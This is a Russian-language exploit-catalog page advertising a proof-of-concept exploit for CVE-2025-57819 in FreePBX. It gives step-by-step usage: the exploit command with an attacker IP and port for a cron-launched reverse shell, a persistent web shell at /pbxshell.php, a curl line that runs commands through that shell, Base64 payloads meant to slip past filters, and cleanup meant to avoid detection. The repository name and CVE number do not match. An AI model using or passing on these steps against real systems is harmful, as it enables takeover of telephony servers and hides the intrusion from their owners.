Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5781 — Эксплойт proof-of-concept для CVE-2025-57819 в FreePBX: SQL-инъекция в AJAX API для выполнения произвольного PHP, создания постоянного веб-шелла и запуска reverse shell. | Kitploit
Инструменты/GitHubGitHub/jasonbernier/cve-2025-5781
Механизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияКомандование и УправлениеРазработка Полезной Нагрузки
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

Эксплойт proof-of-concept для CVE-2025-57819 в FreePBX: SQL-инъекция в AJAX API для выполнения произвольного PHP, создания постоянного веб-шелла и запуска reverse shell.

Репозиторий
171 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт FreePBX CVE-2025-57819

Описание

Этот скрипт эксплуатирует уязвимость в версиях FreePBX до 16.0.26.0 (CVE-2025-57819), позволяющую удалённым злоумышленникам выполнять произвольный PHP-код из-за недостатка SQL-инъекции в конечной точке AJAX API. Эксплойт создаёт как веб-шелл, так и автоматически запускаемый реверс-шелл.

Детали уязвимости

  • CVE: CVE-2025-57819
  • Затронутые версии: FreePBX < 16.0.26.0
  • Воздействие: удалённое выполнение кода (RCE)
  • Вектор: SQL-инъекция в AJAX API (/admin/ajax.php)

Возможности

  • Создаёт постоянный веб-шелл по адресу /pbxshell.php
  • Настраивает автоматически запускаемый реверс-шелл через cron-задачу
  • Использует полезные нагрузки, закодированные в Base64, для обхода фильтров
  • Автоматическая очистка cron-задач после выполнения

Требования

  • Python 3.x
  • библиотека requests
  • Netcat (для прослушивания реверс-шелла)

Установка

git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

Использование

python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

Параметры:

  • -H HOST: целевой экземпляр FreePBX (например, https://freepbx.example.com)
  • -lhost LHOST: ваш IP-адрес для обратного вызова реверс-шелла
  • -lport LPORT: порт для подключения реверс-шелла

Пример:

python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

Порядок работы эксплойта

  1. Отправляет полезную нагрузку SQL-инъекции для создания веб-шелла
  2. Ожидает создания веб-шелла (~2 минуты)
  3. Создаёт автоматически запускаемый реверс-шелл через cron-задачу
  4. Запускает прослушиватель netcat на указанном порту

Использование веб-шелла

После успешной эксплуатации получите доступ к веб-шеллу через:

curl -X GET "http://TARGET/pbxshell.php?cmd=id"

Очистка

Эксплойт автоматически удаляет cron-задачи после выполнения, чтобы избежать обнаружения.

Примечания

  • Скрипт использует -- для комментирования оставшегося SQL-синтаксиса
  • Все команды выполняются с привилегиями root
  • Требуется доступ на запись к каталогу /var/www/html/

Ссылки

  • CVE-2025-57819
  • Бюллетень безопасности FreePBX
Скачать инструмент